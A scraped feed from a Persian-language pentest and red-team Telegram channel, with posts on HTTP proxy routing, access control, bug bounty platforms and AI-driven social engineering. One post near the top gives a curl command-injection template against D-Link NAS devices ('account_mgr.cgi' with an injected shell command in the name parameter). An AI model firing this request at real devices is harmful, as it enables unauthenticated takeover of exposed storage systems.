Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
🥷 تزریق فرمان در پارامتر NAME برای D-Link NAS

اجرای کد از راه دور (RCE) بدون تخصیص در چهار دستگاه مختلف ذخیره‌سازی داده‌های شبکه، که بیش از ۶۰٬۰۰۰ عدد از آن‌ها از طریق اینترنت در دسترس هستند.

یک باگ بسیار ساده که می‌توان با فازبندی ساده پیدا کرد:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"

#pentest #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
🔥6
🔐 آموزش تخصصی هک و امنیت سایبری
🎓 دوره‌های عملی، تحلیل‌ عمیق و محتوای حرفه‌ای در حوزه IT و امنیت اطلاعات
🚀 مناسب علاقه‌مندان، متخصصان و آینده‌سازان حوزه سایبری

📍‌ همراه ما باشید در:
🔗 @sajjadteymouri
🔥2
What is Attribute-Based Access Control (ABAC).pdf
603 KB
💢 کنترل دسترسی مبتنی بر ویژگی (ABAC) چیست؟

هر سازمانی به کنترل‌های دسترسی وابسته است تا داده‌های حساس را محافظت کند، سیاست‌های امنیتی را اجرا نماید و اطمینان حاصل کند که کارمندان سطح مناسبی از دسترسی به سیستم‌ها و برنامه‌ها دارند. به‌طور ساختار یافته، کنترل دسترسی مبتنی بر نقش (RBAC) مدل اصلی بوده است که مجوزها را بر اساس نقش‌های از پیش تعریف‌شده تخصیص می‌دهد. اگرچه این مدل در بسیاری از سناریوها مؤثر است، اما RBAC در محیط‌های پویا که کاربران، دستگاه‌ها و زمینه‌های داده به‌طور مداوم در حال تغییر هستند، محدودیت‌هایی دارد.

@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
13👌3👍1
All Bug Bounty Platforms List TryHackBox .pdf
847 KB
🗞 لیست جامع از همه پلتفرم‌های باگ‌بانتی
#باگ_بانتی #BugBounty
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
👍101
🚀 آموزش Proxies (پارت 5)
🌐 مبانی مسیریابی پروکسی در HTTP (بخش A)

در دنیای پراکسی‌ها (Proxies)، مسیریابی درخواست‌ها یکی از مهم‌ترین عملکردها برای بهبود عملکرد، مقیاس‌پذیری و امنیت است. بیایید با ۳ نوع متداول مسیریابی توسط (Child Proxies) آشنا شویم:

🌀 1. توزیع بار (Load Balancing)
پراکسی فرزند می‌تواند پراکسی والد (Parent Proxy) را بر اساس وضعیت بار فعلی انتخاب کند.
هدف: جلوگیری از فشار زیاد روی یک مسیر
🔁 با پخش ترافیک، عملکرد شبکه بهینه می‌شود.

📍 2. مسیریابی بر اساس موقعیت جغرافیایی
در این روش، پراکسی فرزند والدینی را انتخاب می‌کند که به سرور مبدأ نزدیک‌تر هستند.
هدف: کاهش تأخیر (Latency) و بهبود تجربه کاربر
🌍 مثال: درخواست کاربر ایرانی به والد نزدیک به خاورمیانه ارسال می‌شود.

📦 3. مسیریابی بر اساس نوع درخواست یا پروتکل
پراکسی ممکن است بسته به نوع پروتکل یا مسیر URI، درخواست را به والد خاصی ارسال کند.
🔗 مثلا درخواست‌های REST به یک والد، و SOAP به والد دیگر ارسال شود.
هدف: تخصصی‌سازی مسیر و افزایش بهره‌وری

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity
👍41🤔1
🌐 مبانی مسیریابی پروکسی در HTTP (بخش B)
در این قسمت دو محور را بررسی می‌کنیم:
1️⃣ روش Subnoscription-Based Routing
2️⃣ روش‌های چهارگانه انتقال ترافیک کلاینت به پراکسی‌ها (How Proxies Get Traffic)

روش Subnoscription-Based Routing چیست؟

در برخی زیرساخت‌ها، ارائه‌دهندگان محتوا (مثل CDNها یا شرکت‌های تبلیغاتی) برای داشتن کیفیت بهتر سرویس و سرعت بالاتر دسترسی، به ارائه‌دهنده پراکسی مبلغ بیشتری پرداخت می‌کنند.

ویژگی‌های این نوع مسیردهی:

* محتوا زودتر به کش منتقل می‌شود.
* داده‌ها فشرده‌تر و سریع‌تر ارائه می‌شوند.
* درخواست‌ها بر اساس زبان برنامه‌نویسی، افزونه یا منطق خاص به سرور یا پراکسی مناسب فرستاده می‌شوند.
* در محصولات مرورگر، افزونه، یا سیستم‌عامل، به شکل متفاوتی پیاده‌سازی می‌شود.

📌 هدف اصلی: افزایش سرعت بارگذاری و کاهش تاخیر در پاسخ‌دهی به کاربر نهایی



🛰 چگونه ترافیک کلاینت‌ها به پراکسی می‌رسد؟ (4 راه اصلی)

در مدل کلاسیک، مرورگرها مستقیم به سرور وب متصل می‌شوند. اما پراکسی‌ها این مسیر را تغییر می‌دهند. روش‌های زیر برای هدایت ترافیک کلاینت به پراکسی استفاده می‌شوند:


🔹 1. تغییر در کلاینت (Modify the Client)
🔧 با تنظیم دستی یا خودکار پراکسی در مرورگر (مثل Chrome یا Firefox):
• اگر کلاینت به‌درستی تنظیم شده باشد، همه‌ی درخواست‌های HTTP را مستقیماً به پراکسی ارسال می‌کند.
• این روش واضح، مستقیم و کنترل‌شده است.

📥 مثال: کاربر در تنظیمات مرورگر آدرس proxy.mycompany.local:3128 را وارد می‌کند.

🔹 2. تغییر در شبکه (Modify the Network)
🎯 به کمک تجهیزات شبکه مثل فایروال، سوییچ یا روتر:
پراکسی به‌صورت Interception یا Transparent اجرا می‌شود.
• کاربر حتی متوجه نمی‌شود که ترافیکش به پراکسی می‌رود.

📌 مثال: فایروال سازمان، تمام ترافیک پورت 80 را به پراکسی هدایت می‌کند.
📛 توجه: استفاده نادرست از این روش می‌تواند باعث نقض حریم خصوصی یا مشکلات امنیتی شود.

🔹 3. تغییر در نام‌گذاری دی ان اس (Modify the DNS Namespace)
🌍 با فریب DNS یا استفاده از رکوردهای DNS خاص (Surrogates):
• آدرس‌هایی که کاربران وارد می‌کنند، به جای سرور واقعی، به آدرس پراکسی اشاره می‌کنند.
• با DNS میشود IP مقصد را هنگام درخواست، دینامیک و طبق سیاست خاص محاسبه کند.

📥 مثال: کاربر example.com را باز می‌کند، ولی DNS، IP پراکسی را به او می‌دهد.

🔹 4. تغییر در وب‌سرور (Modify the Web Server)
🖥 وب‌سرور به کلاینت دستور استفاده از پراکسی را می‌دهد:
• با ارسال پاسخ HTTP 305 Use Proxy
• کلاینت در پاسخ به این دستور، از پراکسی تعیین‌شده استفاده می‌کند.

⚠️ این روش به دلایل امنیتی در اکثر مرورگرها دیگر پشتیبانی نمی‌شود.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity
3
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox

🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial

🔶 داستان های هک
🆔 @TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔 @TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod



👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup


🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
سرفصل مقاله
JSON Code Cheatsheet (in cybersecurity terms)

@TryHackBox
❤‍🔥5
JSON Cheatsheet.pdf
4.9 MB
✏️ مقاله تالیف شده
JSON Code Cheatsheet (in cybersecurity terms)


✍️نویسنده
@TryHackBox | The Chaos

#JSON #CheatSheet #CyberSecurity
❤‍🔥5
Social Engineering and AI.pdf
1.3 MB
هوش مصنوعی و مهندسی اجتماعی

هوش مصنوعی در حال پیشبرد نوآوری و دگرگونی تمام صنایع است از بهداشت و درمان تا خرده‌فروشی و تولید.هوش مصنوعی به کسب‌وکارها در سراسر جهان توانایی عملکرد با کارایی و پیچیدگی بیشتر را می‌دهد. به همین ترتیب،هوش مصنوعی به مجرمان سایبری نیز قدرت می‌بخشد.

تکنیک کلاسیک مهندسی اجتماعی شامل روش‌های فریبنده مانند جعل هویت یا دستکاری اعتماد برای استخراج اطلاعات شخصی و محرمانه از افراد تارگت است.با افزایش قدرت و دسترسی ابزارهای هوش مصنوعی، حملات مهندسی اجتماعی اکنون به طور قابل توجهی شخصی‌سازی شده‌تر، مؤثرتر و مقیاس‌پذیرتر شده‌اند. دفاع در برابر چنین حملاتی به ابزارهای پیچیده‌تری نسبت به گذشته نیاز دارد.

در این مقاله،بررسی خواهیم کرد که چگونه هوش مصنوعی مهندسی اجتماعی را به سطح جدیدی ارتقا داده است.به طور خاص، به این خواهیم پرداخت که چگونه فناوری‌های نوظهور مانند دیپ‌فیک‌ها، تکنیک‌های مهندسی اجتماعی را تقویت کرده و پتانسیل تقلب را افزایش داده‌اند. همچنین راهبردهای کاهش تهدید و ابزارهای موجود برای سازمان‌ها را برای مقابله مؤثر با این چالش بررسی خواهیم کرد.

#مهندسی_اجتماعی
#AI #SE
@TryHackBox
21
دوستان #سوال بهترین و بدترین تجربه‌تان با آکادمی‌ها که آموزش دیدید چه بوده؟


اگر مایل نبودید توی کامنت ها بنویسید میتوانید در اکانت پشیبانی جواب بدید
@THBxSupport
برگزاری جلسه ویس چت : مهندس سهیل هاشمی

با سلام خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص اهمیت ردتیم ( Red Team ) در سازمان ها به صورت ویس چت برگزار کنیم.

🎙️ مهمان ویژه: 
مهندس سهیل هاشمی – کارشناس Red Team

📅 زمان برگزاری: امشب
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 20:30

💬 سوالات خود را درباره Red Team در کامنت‌هاارسال کنید تا در جلسه به آن‌ها پرداخته شود.

🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .

@TryHackBox
👍6🔥4
Live stream started
Live stream finished (46 minutes)
Live stream started
Live stream finished (1 hour)
ماشین‌های_هکر:_آینده_تست_نفوذ_با_هوش_مصنوعی.pdf
265.5 KB
ماژول 01 از اسلاید‌های دوره CEHv13
بخش هوش‌مصنوعی

گردآورندگان : حسین نائیجی و کاوه
به زبان شیرین فارسی
#CEHv13 #AI
@TryHackBox
81